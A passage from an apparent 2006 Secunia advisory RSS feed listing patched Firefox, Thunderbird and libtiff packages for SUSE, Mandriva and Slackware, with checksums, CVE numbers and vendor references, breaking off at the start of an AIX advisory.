ftp://ftp.suse.com/pub/suse/i386...underbird-1.5.0.5-0.1.x86_64.rpm<br>
5f797b743baa880b609350dce4003e28<br>
<br>
SUSE LINUX 9.2:<br>
ftp://ftp.suse.com/pub/suse/i386...laFirefox-1.5.0.6-1.4.x86_64.rpm<br>
02d00c594d85c27901ac8975ff4074b5<br>
ftp://ftp.suse.com/pub/suse/i386...nslations-1.5.0.6-1.4.x86_64.rpm<br>
c3e1ab3e8bffa3b7fd1f8c93253bd387<br>
ftp://ftp.suse.com/pub/suse/i386...underbird-1.5.0.5-0.1.x86_64.rpm<br>
409577b2b376df93980071fa6b080638<br>
<br>
Sources:<br>
<br>
SUSE LINUX 10.1:<br>
ftp://ftp.suse.com/pub/suse/upda...zillaFirefox-1.5.0.6-1.3.src.rpm<br>
8052f82d870aa163544f20fb0e6e2a7e<br>
ftp://ftp.suse.com/pub/suse/upda...aThunderbird-1.5.0.5-0.1.src.rpm<br>
a6cc091a2379e066d89f30cc4ef4daca<br>
ftp://ftp.suse.com/pub/suse/upda.../src/seamonkey-1.0.4-2.1.src.rpm<br>
22f8c43051e3f87df2f6c892259b84c1<br>
<br>
SUSE LINUX 10.0:<br>
ftp://ftp.suse.com/pub/suse/i386...zillaFirefox-1.5.0.6-1.2.src.rpm<br>
b369c54440dab641eaca7ffacce2fdca<br>
ftp://ftp.suse.com/pub/suse/i386...aThunderbird-1.5.0.5-0.1.src.rpm<br>
3d8939c81652438cc45df2dfafad3401<br>
<br>
SUSE LINUX 9.3:<br>
ftp://ftp.suse.com/pub/suse/i386...zillaFirefox-1.5.0.6-1.4.src.rpm<br>
6e343044e7c9061e7893d1ad798fb683<br>
ftp://ftp.suse.com/pub/suse/i386...aThunderbird-1.5.0.5-0.1.src.rpm<br>
520ad8710e85f56082e8f744dd7fa9b4<br>
<br>
SUSE LINUX 9.2:<br>
ftp://ftp.suse.com/pub/suse/i386...zillaFirefox-1.5.0.6-1.4.src.rpm<br>
e102231a46d19c0d05f6e31318a6527e<br>
ftp://ftp.suse.com/pub/suse/i386...aThunderbird-1.5.0.5-0.1.src.rpm<br>
206929deb348a7ca699d92cda0e4c3e1<br>
<br>
Original Advisory:<br>
http://lists.suse.com/archive/su...rity-announce/2006-Aug/0007.html<br>
<br>
Other References:<br>
SA19873:<br>
http://secunia.com/advisories/19873/<br>
<br>
SA21229:<br>
http://secunia.com/advisories/21229/<br>
<br>
SA21228:<br>
http://secunia.com/advisories/21228/<br>
]]></description>
            <link>http://secunia.com/advisories/21529/</link>
            <pubDate>Mon, 21 Aug 2006 09:12:26 -0400</pubDate>
        </item>

        <item>
            <title>Mandriva update for mozilla-firefox</title>
            <description><![CDATA[Secunia Advisory:	SA21532	Print Advisory  <br>
Release Date:	2006-08-17<br>
Last Update:	2006-08-18<br>
<br>
Critical:	<br>
Highly critical<br>
Impact:	Security Bypass<br>
Cross Site Scripting<br>
Spoofing<br>
Exposure of system information<br>
Exposure of sensitive information<br>
DoS<br>
System access<br>
Where:	From remote<br>
Solution Status:	Vendor Patch<br>
<br>
OS:	Mandriva Linux 2006<br>
<br>
	Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it.<br>
<br>
CVE reference:	CVE-2006-2613<br>
CVE-2006-2894<br>
CVE-2006-2775<br>
CVE-2006-2776<br>
CVE-2006-2777<br>
CVE-2006-2778<br>
CVE-2006-2779<br>
CVE-2006-2780<br>
CVE-2006-2782<br>
CVE-2006-2783<br>
CVE-2006-2784<br>
CVE-2006-2785<br>
CVE-2006-2786<br>
CVE-2006-2787<br>
CVE-2006-2788<br>
CVE-2006-3677<br>
CVE-2006-3803<br>
CVE-2006-3804<br>
CVE-2006-3806<br>
CVE-2006-3807<br>
CVE-2006-3113<br>
CVE-2006-3801<br>
CVE-2006-3802<br>
CVE-2006-3805<br>
CVE-2006-3808<br>
CVE-2006-3809<br>
CVE-2006-3810<br>
CVE-2006-3811<br>
CVE-2006-3812<br>
<br>
Description:<br>
Mandriva has issued an update for mozilla-firefox. This fixes some vulnerabilities, which can be exploited by malicious people to trick users into disclosing sensitive information, disclose system information, bypass certain security restrictions, conduct cross-site scripting and HTTP response smuggling attacks, and potentially compromise a user's system.<br>
<br>
For more information:<br>
SA14938<br>
SA19873<br>
SA19631<br>
SA20242<br>
SA20244<br>
SA20376<br>
<br>
Solution:<br>
Apply updated packages. Note that the language packs of the previous patch were incorrectly tagged. Updated packages have been released to correct this problem.<br>
<br>
Mandrivalinux 2006<br>
<br>
76ef1a2e7338c08e485ab2c19a1ce691 2006.0/RPMS/devhelp-0.10-7.1.20060mdk.i586.rpm<br>
d44f02b82df9f404f899ad8bc4bdd6a2 2006.0/RPMS/epiphany-1.8.5-4.1.20060mdk.i586.rpm<br>
29efc065aeb4a53a105b2c27be816758 2006.0/RPMS/epiphany-devel-1.8.5-4.1.20060mdk.i586.rpm<br>
caad34c0d4c16a50ec4b05820e6d01db 2006.0/RPMS/galeon-2.0.1-1.1.20060mdk.i586.rpm<br>
d0e75938f4e129936351f015bd90a37a 2006.0/RPMS/gnome-doc-utils-0.4.4-2.1.20060mdk.noarch.rpm<br>
652044ff7d9c3170df845011ec696393 2006.0/RPMS/libdevhelp-1_0-0.10-7.1.20060mdk.i586.rpm<br>
bf6dcf87f409d06b42234dbca387b922 2006.0/RPMS/libdevhelp-1_0-devel-0.10-7.1.20060mdk.i586.rpm<br>
e9aaff3090a4459b57367f4903b0458a 2006.0/RPMS/libnspr4-1.5.0.6-1.4.20060mdk.i586.rpm<br>
fa99cbc159722cc0ff9e5710f24ca599 2006.0/RPMS/libnspr4-devel-1.5.0.6-1.4.20060mdk.i586.rpm<br>
d4d45b797ca2f2347c0409d9f956ff25 2006.0/RPMS/libnspr4-static-devel-1.5.0.6-1.4.20060mdk.i586.rpm<br>
8d33e72703090a911f7fd171ad9dd719 2006.0/RPMS/libnss3-1.5.0.6-1.4.20060mdk.i586.rpm<br>
23afd287c042c5492c210255554a6893 2006.0/RPMS/libnss3-devel-1.5.0.6-1.4.20060mdk.i586.rpm<br>
4a188f54230b943ea9c8930eb2e0cfe1 2006.0/RPMS/mozilla-firefox-1.5.0.6-1.4.20060mdk.i586.rpm<br>
3066a80fbf87985e37fa9c288759d56d 2006.0/RPMS/mozilla-firefox-br-1.5.0.6-0.2.20060mdk.i586.rpm<br>
ea4ca97b017f8f1d2d604ef2195fc4c8 2006.0/RPMS/mozilla-firefox-ca-1.5.0.6-0.2.20060mdk.i586.rpm<br>
fbda2f14cff844cd9ba41567697f984a 2006.0/RPMS/mozilla-firefox-cs-1.5.0.6-0.2.20060mdk.i586.rpm<br>
40df72801040003070d99553c9e3ac56 2006.0/RPMS/mozilla-firefox-da-1.5.0.6-0.2.20060mdk.i586.rpm<br>
367900542d61ef7eb1d309cd134d9d60 2006.0/RPMS/mozilla-firefox-de-1.5.0.6-0.2.20060mdk.i586.rpm<br>
4610d0e6e2e9a82fd5d5680605dd44a5 2006.0/RPMS/mozilla-firefox-el-1.5.0.6-0.2.20060mdk.i586.rpm<br>
cdc46b5093163f7e98975b2b38957f88 2006.0/RPMS/mozilla-firefox-es-1.5.0.6-0.2.20060mdk.i586.rpm<br>
7a03a1269eefbeaf11dc1b25f8f1866f 2006.0/RPMS/mozilla-firefox-fi-1.5.0.6-0.2.20060mdk.i586.rpm<br>
c334906066f6d36e3c73aeb762a4360c 2006.0/RPMS/mozilla-firefox-fr-1.5.0.6-0.2.20060mdk.i586.rpm<br>
9679249207f221f5dd5e36f6af519a98 2006.0/RPMS/mozilla-firefox-ga-1.5.0.6-0.2.20060mdk.i586.rpm<br>
f1d893661c5e0acad4520918df2004f5 2006.0/RPMS/mozilla-firefox-he-1.5.0.6-0.2.20060mdk.i586.rpm<br>
6009d8f4c6daf8264c39ce838e27b9be 2006.0/RPMS/mozilla-firefox-hu-1.5.0.6-0.2.20060mdk.i586.rpm<br>
19cc3674df81e4a070cfa7256108e482 2006.0/RPMS/mozilla-firefox-it-1.5.0.6-0.2.20060mdk.i586.rpm<br>
3ac9c2bc04d3fd0c39aee23ad7246047 2006.0/RPMS/mozilla-firefox-ja-1.5.0.6-0.2.20060mdk.i586.rpm<br>
a68321cdf701aa05d53d187b5504e207 2006.0/RPMS/mozilla-firefox-ko-1.5.0.6-0.2.20060mdk.i586.rpm<br>
45236d15d31f20c10de8f6330fe685af 2006.0/RPMS/mozilla-firefox-nb-1.5.0.6-0.2.20060mdk.i586.rpm<br>
3d14682e6a516afc7df1c15f246c1c71 2006.0/RPMS/mozilla-firefox-nl-1.5.0.6-0.2.20060mdk.i586.rpm<br>
8d976e695dc11f0cc566ac356e8ae871 2006.0/RPMS/mozilla-firefox-pl-1.5.0.6-0.2.20060mdk.i586.rpm<br>
28b7dbf8c079430dd21bf41a8b4322f5 2006.0/RPMS/mozilla-firefox-pt_BR-1.5.0.6-0.2.20060mdk.i586.rpm<br>
156fbf0703fb64181ec788fa962c38e9 2006.0/RPMS/mozilla-firefox-ro-1.5.0.6-0.2.20060mdk.i586.rpm<br>
282f8a8abab2866756fe01396f774fd0 2006.0/RPMS/mozilla-firefox-ru-1.5.0.6-0.2.20060mdk.i586.rpm<br>
e68b4f5bd930c9f721be51a026d3a5a9 2006.0/RPMS/mozilla-firefox-sk-1.5.0.6-0.2.20060mdk.i586.rpm<br>
e43aee54683c32249d865aae705980bd 2006.0/RPMS/mozilla-firefox-sl-1.5.0.6-0.2.20060mdk.i586.rpm<br>
578d91940b92feec2935485752dc3376 2006.0/RPMS/mozilla-firefox-sv-1.5.0.6-0.2.20060mdk.i586.rpm<br>
1a7f222366b0ea40bfc74c002d252a3a 2006.0/RPMS/mozilla-firefox-tr-1.5.0.6-0.2.20060mdk.i586.rpm<br>
169be404e20f76d705db97da7be10f5d 2006.0/RPMS/mozilla-firefox-zh_CN-1.5.0.6-0.2.20060mdk.i586.rpm<br>
01fa9f889097019d293aca92a2c3f68d 2006.0/RPMS/mozilla-firefox-zh_TW-1.5.0.6-0.2.20060mdk.i586.rpm<br>
aaba2fa72f8de960a3a757b3010027d3 2006.0/RPMS/mozilla-firefox-devel-1.5.0.6-1.4.20060mdk.i586.rpm<br>
1c7ab93275bcdcf30ed9ec2ddb4893df 2006.0/RPMS/yelp-2.10.0-6.1.20060mdk.i586.rpm<br>
60279919aa5f17c2ecd9f64db87cb952 2006.0/SRPMS/devhelp-0.10-7.1.20060mdk.src.rpm<br>
c446c046409b6697a863868fe5c64222 2006.0/SRPMS/epiphany-1.8.5-4.1.20060mdk.src.rpm<br>
e726300336f737c8952f664bf1866d6f 2006.0/SRPMS/galeon-2.0.1-1.1.20060mdk.src.rpm<br>
e9e30596eceb0bc9a03f7880cd7d14ea 2006.0/SRPMS/gnome-doc-utils-0.4.4-2.1.20060mdk.src.rpm<br>
4168c73cba97276fa4868b4ac2c7eb19 2006.0/SRPMS/mozilla-firefox-1.5.0.6-1.4.20060mdk.src.rpm<br>
56becb4c6755376ee10e50047fee65a0 2006.0/SRPMS/mozilla-firefox-br-1.5.0.6-0.2.20060mdk.src.rpm<br>
4d77e6309e7e375aec38aee2a141e35b 2006.0/SRPMS/mozilla-firefox-ca-1.5.0.6-0.2.20060mdk.src.rpm<br>
fe7bd0b0c6b61416f96d137b1a92a437 2006.0/SRPMS/mozilla-firefox-cs-1.5.0.6-0.2.20060mdk.src.rpm<br>
c3724cca845ce05cf648f362f83038bd 2006.0/SRPMS/mozilla-firefox-da-1.5.0.6-0.2.20060mdk.src.rpm<br>
25fe2702343a719c20605f50d5aa1e34 2006.0/SRPMS/mozilla-firefox-de-1.5.0.6-0.2.20060mdk.src.rpm<br>
41bf67b80e5665de595b2ee9f7721161 2006.0/SRPMS/mozilla-firefox-el-1.5.0.6-0.2.20060mdk.src.rpm<br>
e326a042c23f8a3e1736a8bd0c6ec2a0 2006.0/SRPMS/mozilla-firefox-es-1.5.0.6-0.2.20060mdk.src.rpm<br>
27d9ceca2f738878af2caff5ca0f3242 2006.0/SRPMS/mozilla-firefox-fi-1.5.0.6-0.2.20060mdk.src.rpm<br>
c0f8f908861f6bdce69aa3dedc9d3182 2006.0/SRPMS/mozilla-firefox-fr-1.5.0.6-0.2.20060mdk.src.rpm<br>
9ba714fa16a09fba10ded7ecde966c11 2006.0/SRPMS/mozilla-firefox-ga-1.5.0.6-0.2.20060mdk.src.rpm<br>
47457095800038d73f3bdcb2f0ed36d0 2006.0/SRPMS/mozilla-firefox-he-1.5.0.6-0.2.20060mdk.src.rpm<br>
05009be65b3fea49699b31df71062dee 2006.0/SRPMS/mozilla-firefox-hu-1.5.0.6-0.2.20060mdk.src.rpm<br>
afbd053cdb6ff14c43e689c89c4550e0 2006.0/SRPMS/mozilla-firefox-it-1.5.0.6-0.2.20060mdk.src.rpm<br>
2a0787c0257695b6fc1aaf1bdf8b9534 2006.0/SRPMS/mozilla-firefox-ja-1.5.0.6-0.2.20060mdk.src.rpm<br>
112d4d2954a00325f0a0531bae150d45 2006.0/SRPMS/mozilla-firefox-ko-1.5.0.6-0.2.20060mdk.src.rpm<br>
01c5ab334ff459db03636aa8de1cced5 2006.0/SRPMS/mozilla-firefox-nb-1.5.0.6-0.2.20060mdk.src.rpm<br>
ad95f2d936c8015fd0c6f383975c286f 2006.0/SRPMS/mozilla-firefox-nl-1.5.0.6-0.2.20060mdk.src.rpm<br>
2393b778369ede7080e6e3b846b773e7 2006.0/SRPMS/mozilla-firefox-pl-1.5.0.6-0.2.20060mdk.src.rpm<br>
15c7832479b17e2123762a44bb3f85f3 2006.0/SRPMS/mozilla-firefox-pt_BR-1.5.0.6-0.2.20060mdk.src.rpm<br>
cdb551a0c81fb597818506e9534966ed 2006.0/SRPMS/mozilla-firefox-ro-1.5.0.6-0.2.20060mdk.src.rpm<br>
b56224c409b82426cd1414f4c2694619 2006.0/SRPMS/mozilla-firefox-ru-1.5.0.6-0.2.20060mdk.src.rpm<br>
8941bf88442f03649638b745948ea2f7 2006.0/SRPMS/mozilla-firefox-sk-1.5.0.6-0.2.20060mdk.src.rpm<br>
b929ab1c79140da9439f1ab95be84ff6 2006.0/SRPMS/mozilla-firefox-sl-1.5.0.6-0.2.20060mdk.src.rpm<br>
341dd76ff73c819a0c3af0f568f5989a 2006.0/SRPMS/mozilla-firefox-sv-1.5.0.6-0.2.20060mdk.src.rpm<br>
9d4673a1f24a354f71d2b17b3889c4a2 2006.0/SRPMS/mozilla-firefox-tr-1.5.0.6-0.2.20060mdk.src.rpm<br>
57b9a304899801e30a3c4f451e411a86 2006.0/SRPMS/mozilla-firefox-zh_CN-1.5.0.6-0.2.20060mdk.src.rpm<br>
a42b81860581cc48344a3d3c5e133fcb 2006.0/SRPMS/mozilla-firefox-zh_TW-1.5.0.6-0.2.20060mdk.src.rpm<br>
93cb0acaeddb095d13b37aeb0ab4dd49 2006.0/SRPMS/yelp-2.10.0-6.1.20060mdk.src.rpm<br>
<br>
Mandrivalinux 2006/X86_64<br>
<br>
d52f4955f15f99137dd9a0b2f360c8b2 x86_64/2006.0/RPMS/devhelp-0.10-7.1.20060mdk.x86_64.rpm<br>
369457b4a09c07ba18ee5bb18fb2ffa1 x86_64/2006.0/RPMS/epiphany-1.8.5-4.1.20060mdk.x86_64.rpm<br>
76735684f3ff493770e374a90fd359c7 x86_64/2006.0/RPMS/epiphany-devel-1.8.5-4.1.20060mdk.x86_64.rpm<br>
5da75ab6624f8c8f0c212ce2299d645f x86_64/2006.0/RPMS/galeon-2.0.1-1.1.20060mdk.x86_64.rpm<br>
945059b9456c9ff2ccd40ff4a6d8ae70 x86_64/2006.0/RPMS/gnome-doc-utils-0.4.4-2.1.20060mdk.noarch.rpm<br>
193f97760bb46e16051ba7b6b968f340 x86_64/2006.0/RPMS/lib64devhelp-1_0-0.10-7.1.20060mdk.x86_64.rpm<br>
1b67733b0450cd6572c9879c0eb38640 x86_64/2006.0/RPMS/lib64devhelp-1_0-devel-0.10-7.1.20060mdk.x86_64.rpm<br>
115fcbc6c99bf063cd1768d2b08e9d89 x86_64/2006.0/RPMS/lib64nspr4-1.5.0.6-1.4.20060mdk.x86_64.rpm<br>
686404fa32e2625f23b19e11c548bbe5 x86_64/2006.0/RPMS/lib64nspr4-devel-1.5.0.6-1.4.20060mdk.x86_64.rpm<br>
f0886b330d3f5af566af6cf5572ca671 x86_64/2006.0/RPMS/lib64nspr4-static-devel-1.5.0.6-1.4.20060mdk.x86_64.rpm<br>
10e9abdcb3f952c4db35c85fe58ad8ad x86_64/2006.0/RPMS/lib64nss3-1.5.0.6-1.4.20060mdk.x86_64.rpm<br>
202bab2742f162d1cbd6d36720e6f7fb x86_64/2006.0/RPMS/lib64nss3-devel-1.5.0.6-1.4.20060mdk.x86_64.rpm<br>
e9aaff3090a4459b57367f4903b0458a x86_64/2006.0/RPMS/libnspr4-1.5.0.6-1.4.20060mdk.i586.rpm<br>
fa99cbc159722cc0ff9e5710f24ca599 x86_64/2006.0/RPMS/libnspr4-devel-1.5.0.6-1.4.20060mdk.i586.rpm<br>
d4d45b797ca2f2347c0409d9f956ff25 x86_64/2006.0/RPMS/libnspr4-static-devel-1.5.0.6-1.4.20060mdk.i586.rpm<br>
8d33e72703090a911f7fd171ad9dd719 x86_64/2006.0/RPMS/libnss3-1.5.0.6-1.4.20060mdk.i586.rpm<br>
23afd287c042c5492c210255554a6893 x86_64/2006.0/RPMS/libnss3-devel-1.5.0.6-1.4.20060mdk.i586.rpm<br>
74811077c91dde3bc8c8bae45e5862a7 x86_64/2006.0/RPMS/mozilla-firefox-1.5.0.6-1.4.20060mdk.x86_64.rpm<br>
476ee9a87f650a0ef3523a9619f9f611 x86_64/2006.0/RPMS/mozilla-firefox-devel-1.5.0.6-1.4.20060mdk.x86_64.rpm<br>
2dec96532b6815c16851ff8ab0fc7782 x86_64/2006.0/RPMS/mozilla-firefox-br-1.5.0.6-0.2.20060mdk.x86_64.rpm<br>
9344503f5029e1106e6f73f5b50f2866 x86_64/2006.0/RPMS/mozilla-firefox-ca-1.5.0.6-0.2.20060mdk.x86_64.rpm<br>
8ed97496222f0234ac2aa85e50d1ec1b x86_64/2006.0/RPMS/mozilla-firefox-cs-1.5.0.6-0.2.20060mdk.x86_64.rpm<br>
73861253ab137d647f8aecd4d74207b7 x86_64/2006.0/RPMS/mozilla-firefox-da-1.5.0.6-0.2.20060mdk.x86_64.rpm<br>
3c89a02774e840bc7b0950001a3a00b0 x86_64/2006.0/RPMS/mozilla-firefox-de-1.5.0.6-0.2.20060mdk.x86_64.rpm<br>
e82c85b58a2cd3d477832c9c569979c2 x86_64/2006.0/RPMS/mozilla-firefox-el-1.5.0.6-0.2.20060mdk.x86_64.rpm<br>
70bc435961a12cf39df566fd231b16a0 x86_64/2006.0/RPMS/mozilla-firefox-es-1.5.0.6-0.2.20060mdk.x86_64.rpm<br>
0b0a69058784f00b9cfd5d4f3e078ea0 x86_64/2006.0/RPMS/mozilla-firefox-fi-1.5.0.6-0.2.20060mdk.x86_64.rpm<br>
5447c5436e2447d18f13d46c4fb445fb x86_64/2006.0/RPMS/mozilla-firefox-fr-1.5.0.6-0.2.20060mdk.x86_64.rpm<br>
6a9e3c0fd3777b4e7d2d6a17bece3857 x86_64/2006.0/RPMS/mozilla-firefox-ga-1.5.0.6-0.2.20060mdk.x86_64.rpm<br>
f2cf1a907884cc7498f1a5bd485e0424 x86_64/2006.0/RPMS/mozilla-firefox-he-1.5.0.6-0.2.20060mdk.x86_64.rpm<br>
5fd37c2bdd060fb05bf96e812c76057f x86_64/2006.0/RPMS/mozilla-firefox-hu-1.5.0.6-0.2.20060mdk.x86_64.rpm<br>
fb21eb787a0e1f30e339431121a7f889 x86_64/2006.0/RPMS/mozilla-firefox-it-1.5.0.6-0.2.20060mdk.x86_64.rpm<br>
d4c9cc5dfbfec3cd9af6f1e6750ad3da x86_64/2006.0/RPMS/mozilla-firefox-ja-1.5.0.6-0.2.20060mdk.x86_64.rpm<br>
ec28ade683c83b871f87d378a84f8b81 x86_64/2006.0/RPMS/mozilla-firefox-ko-1.5.0.6-0.2.20060mdk.x86_64.rpm<br>
0996ebb2c1e087d7ef7eb7b8befadebf x86_64/2006.0/RPMS/mozilla-firefox-nb-1.5.0.6-0.2.20060mdk.x86_64.rpm<br>
4047a8426436599b42366a60278166e3 x86_64/2006.0/RPMS/mozilla-firefox-nl-1.5.0.6-0.2.20060mdk.x86_64.rpm<br>
9c714145a93c32e6ad07ae592068d71a x86_64/2006.0/RPMS/mozilla-firefox-pl-1.5.0.6-0.2.20060mdk.x86_64.rpm<br>
3449354b2e0661eff8d44bf4754e8d42 x86_64/2006.0/RPMS/mozilla-firefox-pt_BR-1.5.0.6-0.2.20060mdk.x86_64.rpm<br>
8b3142193601b299d14a3a7f0c4ef4a8 x86_64/2006.0/RPMS/mozilla-firefox-ro-1.5.0.6-0.2.20060mdk.x86_64.rpm<br>
a28a2acc79e4c942c92ecdeaf8a72ac4 x86_64/2006.0/RPMS/mozilla-firefox-ru-1.5.0.6-0.2.20060mdk.x86_64.rpm<br>
d38d126a7beaf929e6645454fe73bf45 x86_64/2006.0/RPMS/mozilla-firefox-sk-1.5.0.6-0.2.20060mdk.x86_64.rpm<br>
0f222b2d6aca34636f68c6f37eee9d22 x86_64/2006.0/RPMS/mozilla-firefox-sl-1.5.0.6-0.2.20060mdk.x86_64.rpm<br>
8f3954077d7f47b5e61afdbb2a776a48 x86_64/2006.0/RPMS/mozilla-firefox-sv-1.5.0.6-0.2.20060mdk.x86_64.rpm<br>
00604741447b008c86484ff559171bae x86_64/2006.0/RPMS/mozilla-firefox-tr-1.5.0.6-0.2.20060mdk.x86_64.rpm<br>
330a70efd7bf58f3261d03ec5ac47034 x86_64/2006.0/RPMS/mozilla-firefox-zh_CN-1.5.0.6-0.2.20060mdk.x86_64.rpm<br>
d17915183c1510785adc8d1ba421030b x86_64/2006.0/RPMS/mozilla-firefox-zh_TW-1.5.0.6-0.2.20060mdk.x86_64.rpm<br>
9e33e2a0c3d4a92a0b420c417fcd3469 x86_64/2006.0/RPMS/yelp-2.10.0-6.1.20060mdk.x86_64.rpm<br>
60279919aa5f17c2ecd9f64db87cb952 x86_64/2006.0/SRPMS/devhelp-0.10-7.1.20060mdk.src.rpm<br>
c446c046409b6697a863868fe5c64222 x86_64/2006.0/SRPMS/epiphany-1.8.5-4.1.20060mdk.src.rpm<br>
e726300336f737c8952f664bf1866d6f x86_64/2006.0/SRPMS/galeon-2.0.1-1.1.20060mdk.src.rpm<br>
e9e30596eceb0bc9a03f7880cd7d14ea x86_64/2006.0/SRPMS/gnome-doc-utils-0.4.4-2.1.20060mdk.src.rpm<br>
4168c73cba97276fa4868b4ac2c7eb19 x86_64/2006.0/SRPMS/mozilla-firefox-1.5.0.6-1.4.20060mdk.src.rpm<br>
56becb4c6755376ee10e50047fee65a0 x86_64/2006.0/SRPMS/mozilla-firefox-br-1.5.0.6-0.2.20060mdk.src.rpm<br>
4d77e6309e7e375aec38aee2a141e35b x86_64/2006.0/SRPMS/mozilla-firefox-ca-1.5.0.6-0.2.20060mdk.src.rpm<br>
fe7bd0b0c6b61416f96d137b1a92a437 x86_64/2006.0/SRPMS/mozilla-firefox-cs-1.5.0.6-0.2.20060mdk.src.rpm<br>
c3724cca845ce05cf648f362f83038bd x86_64/2006.0/SRPMS/mozilla-firefox-da-1.5.0.6-0.2.20060mdk.src.rpm<br>
25fe2702343a719c20605f50d5aa1e34 x86_64/2006.0/SRPMS/mozilla-firefox-de-1.5.0.6-0.2.20060mdk.src.rpm<br>
41bf67b80e5665de595b2ee9f7721161 x86_64/2006.0/SRPMS/mozilla-firefox-el-1.5.0.6-0.2.20060mdk.src.rpm<br>
e326a042c23f8a3e1736a8bd0c6ec2a0 x86_64/2006.0/SRPMS/mozilla-firefox-es-1.5.0.6-0.2.20060mdk.src.rpm<br>
27d9ceca2f738878af2caff5ca0f3242 x86_64/2006.0/SRPMS/mozilla-firefox-fi-1.5.0.6-0.2.20060mdk.src.rpm<br>
c0f8f908861f6bdce69aa3dedc9d3182 x86_64/2006.0/SRPMS/mozilla-firefox-fr-1.5.0.6-0.2.20060mdk.src.rpm<br>
9ba714fa16a09fba10ded7ecde966c11 x86_64/2006.0/SRPMS/mozilla-firefox-ga-1.5.0.6-0.2.20060mdk.src.rpm<br>
47457095800038d73f3bdcb2f0ed36d0 x86_64/2006.0/SRPMS/mozilla-firefox-he-1.5.0.6-0.2.20060mdk.src.rpm<br>
05009be65b3fea49699b31df71062dee x86_64/2006.0/SRPMS/mozilla-firefox-hu-1.5.0.6-0.2.20060mdk.src.rpm<br>
afbd053cdb6ff14c43e689c89c4550e0 x86_64/2006.0/SRPMS/mozilla-firefox-it-1.5.0.6-0.2.20060mdk.src.rpm<br>
2a0787c0257695b6fc1aaf1bdf8b9534 x86_64/2006.0/SRPMS/mozilla-firefox-ja-1.5.0.6-0.2.20060mdk.src.rpm<br>
112d4d2954a00325f0a0531bae150d45 x86_64/2006.0/SRPMS/mozilla-firefox-ko-1.5.0.6-0.2.20060mdk.src.rpm<br>
01c5ab334ff459db03636aa8de1cced5 x86_64/2006.0/SRPMS/mozilla-firefox-nb-1.5.0.6-0.2.20060mdk.src.rpm<br>
ad95f2d936c8015fd0c6f383975c286f x86_64/2006.0/SRPMS/mozilla-firefox-nl-1.5.0.6-0.2.20060mdk.src.rpm<br>
2393b778369ede7080e6e3b846b773e7 x86_64/2006.0/SRPMS/mozilla-firefox-pl-1.5.0.6-0.2.20060mdk.src.rpm<br>
15c7832479b17e2123762a44bb3f85f3 x86_64/2006.0/SRPMS/mozilla-firefox-pt_BR-1.5.0.6-0.2.20060mdk.src.rpm<br>
cdb551a0c81fb597818506e9534966ed x86_64/2006.0/SRPMS/mozilla-firefox-ro-1.5.0.6-0.2.20060mdk.src.rpm<br>
b56224c409b82426cd1414f4c2694619 x86_64/2006.0/SRPMS/mozilla-firefox-ru-1.5.0.6-0.2.20060mdk.src.rpm<br>
8941bf88442f03649638b745948ea2f7 x86_64/2006.0/SRPMS/mozilla-firefox-sk-1.5.0.6-0.2.20060mdk.src.rpm<br>
b929ab1c79140da9439f1ab95be84ff6 x86_64/2006.0/SRPMS/mozilla-firefox-sl-1.5.0.6-0.2.20060mdk.src.rpm<br>
341dd76ff73c819a0c3af0f568f5989a x86_64/2006.0/SRPMS/mozilla-firefox-sv-1.5.0.6-0.2.20060mdk.src.rpm<br>
9d4673a1f24a354f71d2b17b3889c4a2 x86_64/2006.0/SRPMS/mozilla-firefox-tr-1.5.0.6-0.2.20060mdk.src.rpm<br>
57b9a304899801e30a3c4f451e411a86 x86_64/2006.0/SRPMS/mozilla-firefox-zh_CN-1.5.0.6-0.2.20060mdk.src.rpm<br>
a42b81860581cc48344a3d3c5e133fcb x86_64/2006.0/SRPMS/mozilla-firefox-zh_TW-1.5.0.6-0.2.20060mdk.src.rpm<br>
93cb0acaeddb095d13b37aeb0ab4dd49 x86_64/2006.0/SRPMS/yelp-2.10.0-6.1.20060mdk.src.rpm<br>
<br>
Changelog:<br>
2006-08-18: Added additional information about updated language packs.<br>
<br>
Original Advisory:<br>
http://www.mandriva.com/security/advisories?name=MDKSA-2006:143<br>
<br>
Other References:<br>
SA14938:<br>
http://secunia.com/advisories/14938/<br>
<br>
SA19873:<br>
http://secunia.com/advisories/19873/<br>
<br>
SA19631:<br>
http://secunia.com/advisories/19631/<br>
<br>
SA20242:<br>
http://secunia.com/advisories/20242/<br>
<br>
SA20244:<br>
http://secunia.com/advisories/20244/<br>
<br>
SA20376:<br>
http://secunia.com/advisories/20376/<br>
]]></description>
            <link>http://secunia.com/advisories/21532/</link>
            <pubDate>Mon, 21 Aug 2006 09:11:32 -0400</pubDate>
        </item>

        <item>
            <title>Slackware update for libtiff</title>
            <description><![CDATA[Secunia Advisory:	SA21537	Print Advisory  <br>
Release Date:	2006-08-18<br>
<br>
Critical:	<br>
Highly critical<br>
Impact:	DoS<br>
System access<br>
Where:	From remote<br>
Solution Status:	Vendor Patch<br>
<br>
OS:	Slackware Linux 10.0<br>
Slackware Linux 9.0<br>
Slackware Linux 9.1<br>
<br>
	Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it.<br>
<br>
CVE reference:	CVE-2006-3459<br>
CVE-2006-3460<br>
CVE-2006-3461<br>
CVE-2006-3462<br>
CVE-2006-3463<br>
CVE-2006-3464<br>
CVE-2006-3465<br>
<br>
Description:<br>
Slackware has issued an update for libtiff. This fixes some vulnerabilities, which can be exploited by malicious people to cause a DoS (Denial of Service) and potentially compromise a vulnerable system.<br>
<br>
For more information:<br>
SA21304<br>
<br>
Solution:<br>
Apply updated packages.<br>
<br>
Slackware 9.0:<br>
ftp://ftp.slackware.com/pub/slac...ibtiff-3.8.2-i386-1_slack9.0.tgz<br>
<br>
Slackware 9.1:<br>
ftp://ftp.slackware.com/pub/slac...ibtiff-3.8.2-i486-1_slack9.1.tgz<br>
<br>
Slackware 10.0:<br>
ftp://ftp.slackware.com/pub/slac...btiff-3.8.2-i486-1_slack10.0.tgz<br>
<br>
Original Advisory:<br>
http://slackware.com/security/vi...&m=slackware-security.536600<br>
<br>
Other References:<br>
SA21304:<br>
http://secunia.com/advisories/21304/<br>
<br>
<br>
]]></description>
            <link>http://secunia.com/advisories/21537/</link>
            <pubDate>Mon, 21 Aug 2006 09:11:01 -0400</pubDate>
        </item>

        <item>
            <title>AIX setlocale Privilege Escalation Vulnerability</title>
            <description><![CDATA[Secunia Advisory:	SA21541	Print Advisory  <br>
Release Date:	2006-08-18<br>
<br>
Critical:	<br>
Less critical<br>
Impact:	Privilege escalation<br>
Where:	Local system<br>
Solution Status:	Vendor Workaround<br>
<br>
OS:	AIX 5.x<br>
<br>
